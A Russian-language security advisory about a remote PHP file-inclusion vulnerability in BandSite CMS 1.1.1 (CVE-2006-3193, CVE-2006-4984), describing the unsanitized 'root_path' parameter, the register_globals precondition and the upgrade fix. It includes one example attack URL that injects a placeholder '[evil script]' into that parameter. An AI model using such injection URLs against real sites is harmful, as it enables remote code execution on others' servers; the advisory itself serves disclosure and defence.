PHP-инклюдинг в BandSite CMS

Дата публикации:
02.07.2006
Всего просмотров:
1136
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3193
CVE-2006-4984
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
BandSite CMS 1.x
Уязвимые версии: BandSite CMS 1.1.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "root_path" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]

URL производителя: sourceforge.net/projects/bandsitecms/

Решение: Установите последнюю версию (1.1.4) с сайта производителя.

Ссылки: Grayscale BandSite CMS <=([root_path]) Remote File Include Vulnerabilities

или введите имя

CAPTCHA